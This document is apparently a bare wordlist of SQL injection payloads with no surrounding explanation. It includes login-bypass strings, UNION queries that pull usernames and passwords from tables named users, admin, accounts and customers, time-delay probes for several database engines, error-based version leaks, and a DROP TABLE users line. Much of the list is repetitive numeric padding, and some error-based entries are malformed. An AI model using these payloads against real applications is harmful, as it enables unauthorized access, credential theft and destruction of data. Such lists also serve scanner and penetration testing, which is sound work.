' OR '1'='1
' OR 1=1--
' OR 1=1#
admin'--
' OR 'x'='x
' OR 1=1 LIMIT 1--
1' ORDER BY 1--
1' ORDER BY 2--
1' ORDER BY 3--
1' UNION SELECT NULL--
1' UNION SELECT NULL,NULL--
1' UNION SELECT NULL,NULL,NULL--
' UNION SELECT database(),NULL--
' UNION SELECT user(),NULL--
' UNION SELECT version(),NULL--
' AND SLEEP(5)--
' AND 1=1--
' AND 1=2--
'; DROP TABLE users--
1; SELECT * FROM users--
1' OR 1=1--
1 AND 1=1
1' OR 2=2--
' OR 2=2#
1 AND 2=2
1' OR 3=3--
' OR 3=3#
1 AND 3=3
1' OR 4=4--
' OR 4=4#
1 AND 4=4
1' OR 5=5--
' OR 5=5#
1 AND 5=5
1' OR 6=6--
' OR 6=6#
1 AND 6=6
1' OR 7=7--
' OR 7=7#
1 AND 7=7
1' OR 8=8--
' OR 8=8#
1 AND 8=8
1' OR 9=9--
' OR 9=9#
1 AND 9=9
1' OR 10=10--
' OR 10=10#
1 AND 10=10
1' OR 11=11--
' OR 11=11#
1 AND 11=11
1' OR 12=12--
' OR 12=12#
1 AND 12=12
1' OR 13=13--
' OR 13=13#
1 AND 13=13
1' OR 14=14--
' OR 14=14#
1 AND 14=14
1' OR 15=15--
' OR 15=15#
1 AND 15=15
1' OR 16=16--
' OR 16=16#
1 AND 16=16
1' OR 17=17--
' OR 17=17#
1 AND 17=17
1' OR 18=18--
' OR 18=18#
1 AND 18=18
1' OR 19=19--
' OR 19=19#
1 AND 19=19
1' OR 20=20--
' OR 20=20#
1 AND 20=20
1' OR 21=21--
' OR 21=21#
1 AND 21=21
1' OR 22=22--
' OR 22=22#
1 AND 22=22
1' OR 23=23--
' OR 23=23#
1 AND 23=23
1' OR 24=24--
' OR 24=24#
1 AND 24=24
1' OR 25=25--
' OR 25=25#
1 AND 25=25
1' OR 26=26--
' OR 26=26#
1 AND 26=26
1' OR 27=27--
' OR 27=27#
1 AND 27=27
1' OR 28=28--
' OR 28=28#
1 AND 28=28
1' OR 29=29--
' OR 29=29#
1 AND 29=29
1' OR 30=30--
' OR 30=30#
1 AND 30=30
1' OR 31=31--
' OR 31=31#
1 AND 31=31
1' OR 32=32--
' OR 32=32#
1 AND 32=32
1' OR 33=33--
' OR 33=33#
1 AND 33=33
1' OR 34=34--
' OR 34=34#
1 AND 34=34
1' OR 35=35--
' OR 35=35#
1 AND 35=35
1' OR 36=36--
' OR 36=36#
1 AND 36=36
1' OR 37=37--
' OR 37=37#
1 AND 37=37
1' OR 38=38--
' OR 38=38#
1 AND 38=38
1' OR 39=39--
' OR 39=39#
1 AND 39=39
1' OR 40=40--
' OR 40=40#
1 AND 40=40
1' OR 41=41--
' OR 41=41#
1 AND 41=41
1' OR 42=42--
' OR 42=42#
1 AND 42=42
1' OR 43=43--
' OR 43=43#
1 AND 43=43
1' OR 44=44--
' OR 44=44#
1 AND 44=44
1' OR 45=45--
' OR 45=45#
1 AND 45=45
1' OR 46=46--
' OR 46=46#
1 AND 46=46
1' OR 47=47--
' OR 47=47#
1 AND 47=47
1' OR 48=48--
' OR 48=48#
1 AND 48=48
1' OR 49=49--
' OR 49=49#
1 AND 49=49
1' OR 50=50--
' OR 50=50#
1 AND 50=50
' UNION SELECT 1,2,3--
' UNION ALL SELECT 1,NULL,NULL--
' UNION SELECT 2,3,4--
' UNION ALL SELECT 2,NULL,NULL--
' UNION SELECT 3,4,5--
' UNION ALL SELECT 3,NULL,NULL--
' UNION SELECT 4,5,6--
' UNION ALL SELECT 4,NULL,NULL--
' UNION SELECT 5,6,7--
' UNION ALL SELECT 5,NULL,NULL--
' UNION SELECT 6,7,8--
' UNION ALL SELECT 6,NULL,NULL--
' UNION SELECT 7,8,9--
' UNION ALL SELECT 7,NULL,NULL--
' UNION SELECT 8,9,10--
' UNION ALL SELECT 8,NULL,NULL--
' UNION SELECT 9,10,11--
' UNION ALL SELECT 9,NULL,NULL--
' UNION SELECT 10,11,12--
' UNION ALL SELECT 10,NULL,NULL--
' UNION SELECT 11,12,13--
' UNION ALL SELECT 11,NULL,NULL--
' UNION SELECT 12,13,14--
' UNION ALL SELECT 12,NULL,NULL--
' UNION SELECT 13,14,15--
' UNION ALL SELECT 13,NULL,NULL--
' UNION SELECT 14,15,16--
' UNION ALL SELECT 14,NULL,NULL--
' UNION SELECT 15,16,17--
' UNION ALL SELECT 15,NULL,NULL--
' UNION SELECT 16,17,18--
' UNION ALL SELECT 16,NULL,NULL--
' UNION SELECT 17,18,19--
' UNION ALL SELECT 17,NULL,NULL--
' UNION SELECT 18,19,20--
' UNION ALL SELECT 18,NULL,NULL--
' UNION SELECT 19,20,21--
' UNION ALL SELECT 19,NULL,NULL--
' UNION SELECT 20,21,22--
' UNION ALL SELECT 20,NULL,NULL--
1' AND SLEEP(1)--
'; SELECT pg_sleep(1)--
1'; WAITFOR DELAY '0:0:1'--
1' AND SLEEP(2)--
'; SELECT pg_sleep(2)--
1'; WAITFOR DELAY '0:0:2'--
1' AND SLEEP(3)--
'; SELECT pg_sleep(3)--
1'; WAITFOR DELAY '0:0:3'--
1' AND SLEEP(4)--
'; SELECT pg_sleep(4)--
1'; WAITFOR DELAY '0:0:4'--
1' AND SLEEP(5)--
'; SELECT pg_sleep(5)--
1'; WAITFOR DELAY '0:0:5'--
1' AND SLEEP(6)--
'; SELECT pg_sleep(6)--
1'; WAITFOR DELAY '0:0:6'--
1' AND SLEEP(7)--
'; SELECT pg_sleep(7)--
1'; WAITFOR DELAY '0:0:7'--
1' AND SLEEP(8)--
'; SELECT pg_sleep(8)--
1'; WAITFOR DELAY '0:0:8'--
1' AND SLEEP(9)--
'; SELECT pg_sleep(9)--
1'; WAITFOR DELAY '0:0:9'--
1' AND SLEEP(10)--
'; SELECT pg_sleep(10)--
1'; WAITFOR DELAY '0:0:10'--
' UNION SELECT * FROM users--
' UNION SELECT username,password FROM users--
' UNION SELECT * FROM admin--
' UNION SELECT username,password FROM admin--
' UNION SELECT * FROM accounts--
' UNION SELECT username,password FROM accounts--
' UNION SELECT * FROM customers--
' UNION SELECT username,password FROM customers--
' UNION SELECT * FROM members--
' UNION SELECT username,password FROM members--
' AND EXTRACTVALUE(1,1)--
1' AND EXTRACTVALUE(1,CONCAT(0x7e,version()))--
' AND UPDATEXML(1,1)--
1' AND UPDATEXML(1,CONCAT(0x7e,version()))--
' AND CONVERT(1,1)--
1' AND CONVERT(1,CONCAT(0x7e,version()))--
' AND CAST(1,1)--
1' AND CAST(1,CONCAT(0x7e,version()))--